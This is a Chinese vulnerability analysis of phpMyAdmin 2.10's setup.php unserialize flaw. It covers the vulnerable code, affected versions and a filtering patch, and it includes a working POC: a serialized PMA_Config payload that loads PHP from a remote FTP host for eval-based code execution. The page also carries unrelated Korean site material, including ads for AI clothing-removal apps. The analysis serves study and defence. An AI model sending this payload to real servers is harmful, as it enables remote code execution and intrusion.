phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via
目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 对这个漏洞简单的概括如下 1 . " /scripts/setup.php " 会接收用户发送的序列化POST数据action =lay_navigationeoltype=unixtoken=ec4c4c184a
目录
<span>1</span><span>. 漏洞描述 </span><span>2</span><span>. 漏洞触发条件 </span><span>3</span><span>. 漏洞影响范围 </span><span>4</span><span>. 漏洞代码分析 </span><span>5</span><span>. 防御方法 </span><span>6</span>. 攻防思考
1. 漏洞描述
对这个漏洞简单的概括如下
<span>1</span>. <span>"</span><span>/scripts/setup.php</span><span>"</span><span>会接收用户发送的序列化POST数据
action</span>=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%<span>22</span>%3A1%3A%7Bs%3A6%3A%22source%<span>22</span>%3Bs%3A24%3A%22ftp%3A%2f%2f10.<span>125.62</span>.<span>62</span>%2fs.txt%<span>22</span>%3B%7D%<span>7D
</span><span>/*</span><span>
token要动态获取
action=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}
</span><span>*/</span>
<span>2</span>. <span>"</span><span>/scripts/setup.php</span><span>"</span>会对<span>"</span><span>$_POST['configuration']</span><span>"</span><span>进行反序列化
setup.php在反序列化的时候,程序未对输入的原始数据进行有效地恶意检测
</span><span>3</span>. 黑客可以在POST数据中注入<span>"</span><span>序列化后的PMA_Config对象</span><span>"</span><span>
setup.php在反序列化一个</span><span>"</span><span>序列化后的PMA_Config对象</span><span>"</span>的时候,会对这个对象进行<span>"</span><span>重新初始化</span><span>"</span><span>,即再次调用它的构造函数
function __construct($source </span>= <span>null</span><span>)
{
$</span><span>this</span>->settings =<span> array();
</span><span>//</span><span> functions need to refresh in case of config file changed goes in
</span><span>//</span><span> PMA_Config::load()</span>
$<span>this</span>-><span>load($source);
</span><span>//</span><span> other settings, independant from config file, comes in</span>
$<span>this</span>-><span>checkSystem();
$</span><span>this</span>-><span>checkIsHttps();
}
</span><span>4</span>. PMA_Config对象的构造函数会重新引入<span>"</span><span>$source</span><span>"</span>对应的配置文件,这个"$source"是对象重新初始化时本次注册得到的,使用eval执行的方式将配置文件中的变量<span>"</span><span>本地变量注册化</span><span>"</span><span>
function load($source </span>= <span>null</span><span>)
{
$</span><span>this</span>-><span>loadDefaults();
</span><span>if</span> (<span>null</span> !==<span> $source) {
$</span><span>this</span>-><span>setSource($source);
}
</span><span>if</span> (! $<span>this</span>-><span>checkConfigSource()) {
</span><span>return</span> <span>false</span><span>;
}
$cfg </span>=<span> array();
</span><span>/*</span><span>*
* Parses the configuration file
</span><span>*/</span><span>
$old_error_reporting </span>= error_reporting(<span>0</span><span>);
</span><span>//</span><span>使用eval方式引入外部的配置文件</span>
<span>if</span> (function_exists(<span>'</span><span>file_get_contents</span><span>'</span><span>))
{
$eval_result </span>= eval(<span>'</span><span>?></span><span>'</span> . trim(file_get_contents($<span>this</span>-><span>getSource())));
}
</span><span>else</span><span>
{
$eval_result </span>=<span>
eval(</span><span>'</span><span>?></span><span>'</span> . trim(implode(<span>"</span><span>\n</span><span>"</span>, file($<span>this</span>-><span>getSource()))));
}
error_reporting($old_error_reporting);
</span><span>if</span> ($eval_result === <span>false</span><span>) {
$</span><span>this</span>->error_config_file = <span>true</span><span>;
} </span><span>else</span><span> {
$</span><span>this</span>->error_config_file = <span>false</span><span>;
$</span><span>this</span>->source_mtime = filemtime($<span>this</span>-><span>getSource());
}
...</span>最终的结果是,程序代码引入了黑客注入的外部文件的PHP代码,并使用eval进行了执行,导致RCE
Relevant Link:
http:<span>//</span><span>php.net/manual/zh/function.unserialize.php</span> http:<span>//</span><span>drops.wooyun.org/papers/596</span> http:<span>//</span><span>drops.wooyun.org/tips/3909</span> http:<span>//</span><span>blog.csdn.net/cnbird2008/article/details/7491216</span>
2. 漏洞触发条件
0x1: POC
token需要动态获取
<span>1</span><span>. POST
http:</span><span>//</span><span>localhost/phpMyAdmin-2.10.0.2-all-languages/scripts/setup.php</span>
<span>2</span><span>. DATA
action</span>=lay_navigation&eoltype=unix&token=ec4c4c184adfe4b04aa1ae9b90989fc4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%<span>22</span>%3A1%3A%7Bs%3A6%3A%22source%<span>22</span>%3Bs%3A24%3A%22ftp%3A%2f%2f10.<span>125.62</span>.<span>62</span>%2fs.txt%<span>22</span>%3B%7D%<span>7D
</span><span>/*</span><span>
source要是一个外部的文本文件,需要返回的是原生的PHP代码
a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:24:"ftp://10.125.62.62/s.txt";}}
</span><span>*/</span>
3. 漏洞影响范围
<span>1</span>. phpmyadmin <span>2.10</span> <span>2</span>. 2.10
4. 漏洞代码分析
0x1: PHP serialize && unserialize
关于PHP序列化、反序列化存在的安全问题相关知识,请参阅另一篇文章
http:<span>//</span><span>www.cnblogs.com/LittleHann/p/4242535.html</span>
0x2: "/scripts/setup.php"
<span>if</span> (isset($_POST[<span>'</span><span>configuration</span><span>'</span>]) && $action != <span>'</span><span>clear</span><span>'</span><span> )
{
</span><span>//</span><span> Grab previous configuration, if it should not be cleared</span>
$configuration = unserialize($_POST[<span>'</span><span>configuration</span><span>'</span><span>]);
}
</span><span>else</span><span>
{
</span><span>//</span><span> Start with empty configuration</span>
$configuration =<span> array();
}</span>漏洞的根源在于程序信任了用户发送的外部数据,直接进行本地序列化,从而导致"对象注入",黑客通过注入当前已经存在于代码空间的PMA_Config对象,php在反序列化的时候,会自动调用对象的__wakeup函数,在__wakeup函数中,会使用外部传入的$source参数,作为配置文件的来源,然后使用eval将其引入到本地代码空间
0x3: \libraries\Config.class.php
<span>/*</span><span>*
* re-init object after loading from session file
* checks config file for changes and relaods if neccessary
</span><span>*/</span><span>
function __wakeup()
{
</span><span>//</span><span>在执行__wakeup()的时候,$source已经被注册为了外部传入的$source参数</span>
<span>if</span> (! $<span>this</span>-><span>checkConfigSource()
</span>|| $<span>this</span>->source_mtime !== filemtime($<span>this</span>-><span>getSource())
</span>|| $<span>this</span>->default_source_mtime !== filemtime($<span>this</span>-><span>default_source)
</span>|| $<span>this</span>-><span>error_config_file
</span>|| $<span>this</span>-><span>error_config_default_file) {
$</span><span>this</span>->settings =<span> array();
$</span><span>this</span>-><span>load();
$</span><span>this</span>-><span>checkSystem();
}
</span><span>//</span><span> check for https needs to be done everytime,
</span><span>//</span><span> as https and http uses same session so this info can not be stored
</span><span>//</span><span> in session</span>
$<span>this</span>-><span>checkIsHttps();
$</span><span>this</span>-><span>checkCollationConnection();
$</span><span>this</span>-><span>checkFontsize();
}</span>
5. 防御方法
0x1: Apply Patch
<span>if</span> (isset($_POST[<span>'</span><span>configuration</span><span>'</span>]) && $action != <span>'</span><span>clear</span><span>'</span><span> )
{
$configuration </span>=<span> array();
</span><span>//</span><span>协议的匹配忽略大小写</span>
<span>if</span> ( (strpos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>PMA_Config</span><span>"</span>) !== <span>false</span>) && ( (stripos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>ftp://</span><span>"</span>) !== <span>false</span>) || (stripos($_POST[<span>'</span><span>configuration</span><span>'</span>], <span>"</span><span>http://</span><span>"</span>) !== <span>false</span><span>) ) )
{
$configuration </span>=<span> array();
}
</span><span>else</span><span>
{
</span><span>//</span><span> Grab previous configuration, if it should not be cleared</span>
$configuration = unserialize($_POST[<span>'</span><span>configuration</span><span>'</span><span>]);
}
}
</span><span>else</span><span>
{
</span><span>//</span><span> Start with empty configuration</span>
$configuration =<span> array();
}</span>
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
AI Hentai Generator
AI Hentai를 무료로 생성하십시오.
인기 기사
뜨거운 도구
메모장++7.3.1
사용하기 쉬운 무료 코드 편집기
SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.
스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경
드림위버 CS6
시각적 웹 개발 도구
SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)
뜨거운 주제
7316
9
1625
14
1349
46
1261
25
1208
29
phpmyadmin에서 기본 키를 설정하는 방법
Apr 07, 2024 pm 02:54 PM
테이블의 기본 키는 테이블의 각 레코드를 고유하게 식별하는 하나 이상의 열입니다. 기본 키를 설정하는 단계는 다음과 같습니다. phpMyAdmin에 로그인합니다. 데이터베이스와 테이블을 선택합니다. 기본 키로 사용하려는 열을 확인하세요. "변경사항 저장"을 클릭하세요. 기본 키는 데이터 무결성, 조회 속도 및 관계 모델링 이점을 제공합니다.
WordPress 데이터베이스는 어디에 있습니까?
Apr 15, 2024 pm 10:39 PM
WordPress 데이터베이스는 모든 웹사이트 데이터를 저장하는 MySQL 데이터베이스에 보관되어 있으며 호스팅 제공업체의 대시보드, FTP 또는 phpMyAdmin을 통해 액세스할 수 있습니다. 데이터베이스 이름은 웹사이트 URL 또는 사용자 이름과 관련되어 있으며 액세스하려면 일반적으로 "wp-config.php" 파일에 저장되는 이름, 사용자 이름, 비밀번호 및 호스트 이름을 포함한 데이터베이스 자격 증명을 사용해야 합니다.
phpmyadmin에 외래 키를 추가하는 방법
Apr 07, 2024 pm 02:36 PM
phpMyAdmin에 외래 키를 추가하려면 다음 단계를 수행하면 됩니다. 외래 키가 포함된 상위 테이블을 선택합니다. 상위 테이블 구조를 편집하고 "열"에 새 열을 추가합니다. 외래 키 제약 조건을 활성화하고 참조 테이블과 키를 선택합니다. 업데이트/삭제 작업을 설정합니다. 변경 사항을 저장하다.
phpmyadmin 계정의 비밀번호는 무엇입니까?
Apr 07, 2024 pm 01:09 PM
PHPMyAdmin의 기본 사용자 이름과 비밀번호는 루트이며 비어 있습니다. 보안상의 이유로 기본 비밀번호를 변경하는 것이 좋습니다. 비밀번호 변경 방법: 1. PHPMyAdmin에 로그인합니다. 2. "권한"을 선택합니다. 3. 새 비밀번호를 입력하고 저장합니다. 비밀번호를 잊어버린 경우 MySQL 서비스를 중지하고 구성 파일을 편집하여 재설정할 수 있습니다. 1. Skip-grant-tables 줄을 추가합니다. 2. MySQL 명령줄에 로그인하고 루트 비밀번호를 재설정합니다. 4. Skip-grant-tables 줄을 삭제하고 MySQL 서비스를 다시 시작합니다.
phpmyadmin에서 데이터 테이블을 삭제하는 방법
Apr 07, 2024 pm 03:00 PM
phpMyAdmin에서 데이터 테이블을 삭제하는 단계: 데이터베이스와 데이터 테이블을 선택하고 "작업" 탭을 클릭하고 "삭제" 옵션을 선택하고 삭제 작업을 실행합니다.
phpmyadmin 로그는 어디에 있습니까?
Apr 07, 2024 pm 12:57 PM
PHPMyAdmin 로그 파일의 기본 위치: Linux/Unix/macOS:/var/log/phpmyadminWindows: C:\xampp\phpMyAdmin\logs\ 로그 파일 목적: 감사 보안 문제 해결
계산기에서 e는 무엇입니까
Oct 19, 2022 am 11:23 AM
계산기의 e는 10의 거듭제곱을 나타내며, 이는 밑이 10인 지수를 의미합니다. 예를 들어, 1.99714E13은 19971400000000과 같습니다. 10의 n제곱을 곱한 형태로 숫자를 표현하는 것을 과학적 표기법이라고 합니다. : 크거나 작은 것을 많은 자릿수로 표시하거나 연산하고자 할 때, 과학적 표기법을 사용하면 많은 공간과 시간의 낭비를 피할 수 있습니다.
phpmyadmin 액세스가 거부된 이유
Apr 07, 2024 pm 01:03 PM
phpMyAdmin에 의해 액세스가 거부된 이유 및 해결 방법: 인증 실패: 사용자 이름과 비밀번호가 올바른지 확인하세요. 서버 구성 오류: 방화벽 설정을 조정하고 데이터베이스 포트가 올바른지 확인하세요. 권한 문제: 사용자에게 데이터베이스에 대한 액세스 권한을 부여합니다. 세션 시간 초과: 브라우저 페이지를 새로 고치고 다시 연결하세요. phpMyAdmin 구성 오류: 구성 파일과 파일 권한을 확인하여 필수 Apache 모듈이 활성화되어 있는지 확인하세요. 서버 문제: 잠시 기다렸다가 다시 시도하거나 호스팅 제공업체에 문의하세요.
